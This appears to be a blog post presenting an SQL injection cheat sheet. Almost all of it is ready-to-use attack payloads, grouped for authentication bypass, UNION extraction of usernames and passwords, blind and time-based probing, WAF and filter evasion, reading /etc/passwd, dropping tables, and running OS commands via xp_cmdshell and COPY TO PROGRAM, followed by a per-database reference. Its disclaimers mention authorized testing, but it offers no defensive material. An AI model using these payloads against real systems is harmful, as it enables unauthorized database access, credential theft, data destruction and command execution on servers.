Advertisement

Responsive Advertisement

Recent in Technology

SQL injection cheat sheet

SQL Injection Cheat Sheet

๐Ÿง  Basic SQL Injection

  • ' OR '1'='1
  • ' OR 1=1 --
  • " OR 1=1 --
  • ' OR 'a'='a
  • ') OR ('1'='1

๐Ÿ” Authentication Bypass

  • ' OR '1'='1' --
  • ' OR '1'='1' /*
  • ' OR 1=1#
  • admin' --

๐Ÿ“š UNION-Based SQL Injection

Find column count:

  • ' ORDER BY 1--
  • ' ORDER BY 2--

Using UNION:

  • ' UNION SELECT null, null --
  • ' UNION SELECT 1,2,3 --
  • ' UNION SELECT username, password FROM users --

๐Ÿ–ฅ️ Error-Based SQL Injection

  • ' AND 1=CONVERT(int, (SELECT @@version)) --
  • ' AND 1=CAST((SELECT user()) AS int) --

๐Ÿงช Blind SQL Injection

  • ' AND 1=1 -- (True)
  • ' AND 1=2 -- (False)
  • ' AND substring(@@version,1,1)='5' --
  • ' AND ASCII(SUBSTRING((SELECT database()),1,1))=100 --

⏱️ Time-Based Blind SQL Injection

  • ' OR IF(1=1, SLEEP(5), 0) -- (MySQL)
  • '; IF (1=1) WAITFOR DELAY '0:0:5'-- (MSSQL)

๐Ÿ›ก️ WAF Bypass & Obfuscation

  • %27 OR %271%27=%271 (URL encoded)
  • '/**/OR/**/'1'='1
  • ' OR 1=1-- -
  • ')/**/OR/**/(1=1)--
  • UN/**/ION SEL/**/ECT

๐Ÿ“‚ Extracting Data

  • ' UNION SELECT table_name, null FROM information_schema.tables --
  • ' UNION SELECT column_name, null FROM information_schema.columns WHERE table_name='users' --
  • ' UNION SELECT username, password FROM users --

๐Ÿ” Useful Functions (MySQL)

  • database()
  • version()
  • user()
  • @@datadir
  • LOAD_FILE('/etc/passwd')
  • INFORMATION_SCHEMA.TABLES

๐Ÿ”’ MySQL Comments & Tricks

  • -- (Comment)
  • # (Comment)
  • /* comment */
  • ' /*!UNION*/ SELECT

๐Ÿงฌ Stack Queries (MSSQL)

  • '; DROP TABLE users --
  • '; EXEC xp_cmdshell('whoami') --

๐Ÿ” Bypass Filters

  • 'OR'1'='1
  • '||(SELECT 1)=1
  • ' AND CHAR(124)+CHAR(124)+(SELECT 1)=1

๐Ÿ›‘ Disclaimer

This cheat sheet is intended for educational purposes, penetration testing in authorized environments, and improving application security. Do not use these techniques on systems without explicit permission.

๐Ÿ’‰ SQL Injection Cheat Sheet by DBMS

Note: Syntax may vary depending on the database. Always tailor payloads to the specific backend.

๐Ÿ›ข️ MySQL

  • Version: SELECT @@version;
  • Current User: SELECT user();
  • Current DB: SELECT database();
  • List DBs: SELECT schema_name FROM information_schema.schemata;
  • List Tables: SELECT table_name FROM information_schema.tables WHERE table_schema='target_db';
  • List Columns: SELECT column_name FROM information_schema.columns WHERE table_name='target_table';
  • Read File: SELECT LOAD_FILE('/etc/passwd');
  • Time Delay: SLEEP(5)
  • Comment Syntax: -- | # | /* */

๐Ÿ˜ PostgreSQL

  • Version: SELECT version();
  • Current User: SELECT current_user;
  • Current DB: SELECT current_database();
  • List Tables: SELECT table_name FROM information_schema.tables WHERE table_schema='public';
  • List Columns: SELECT column_name FROM information_schema.columns WHERE table_name='target_table';
  • Time Delay: pg_sleep(5);
  • Command Execution (with permissions): COPY (SELECT '') TO PROGRAM 'id';
  • Comment Syntax: --

๐Ÿฆพ Microsoft SQL Server

  • Version: SELECT @@version;
  • Current User: SELECT SYSTEM_USER;
  • Current DB: SELECT DB_NAME();
  • List DBs: SELECT name FROM master..sysdatabases;
  • List Tables: SELECT name FROM sysobjects WHERE xtype='U';
  • Command Execution: EXEC xp_cmdshell 'whoami';
  • Time Delay: WAITFOR DELAY '0:0:5';
  • Comment Syntax: -- | /* */

๐Ÿ”ถ Oracle

  • Version: SELECT * FROM v$version;
  • Current User: SELECT user FROM dual;
  • Current DB: SELECT ora_database_name FROM dual;
  • List Tables: SELECT table_name FROM all_tables;
  • List Columns: SELECT column_name FROM all_tab_columns WHERE table_name='TARGET_TABLE';
  • Time Delay: DBMS_LOCK.SLEEP(5);
  • Command Execution: Java procedures or external tables (if configured)
  • Comment Syntax: -- | /* */

๐Ÿงช Generic Injection Payloads

  • ' OR '1'='1 --
  • ' OR 1=1 --
  • ' UNION SELECT null,null --
  • ' AND 1=0 UNION SELECT username, password FROM users --

๐Ÿ›ก️ Filter Bypass Tricks

  • '/**/OR/**/'1'='1
  • UNION%0ASELECT
  • ' OR 1=1-- -
  • CHAR(97)+CHAR(98)+CHAR(99) (for 'abc')

⚠️ Disclaimer

This content is for educational and authorized penetration testing only. Do not attempt to exploit systems without proper legal consent.

Post a Comment

0 Comments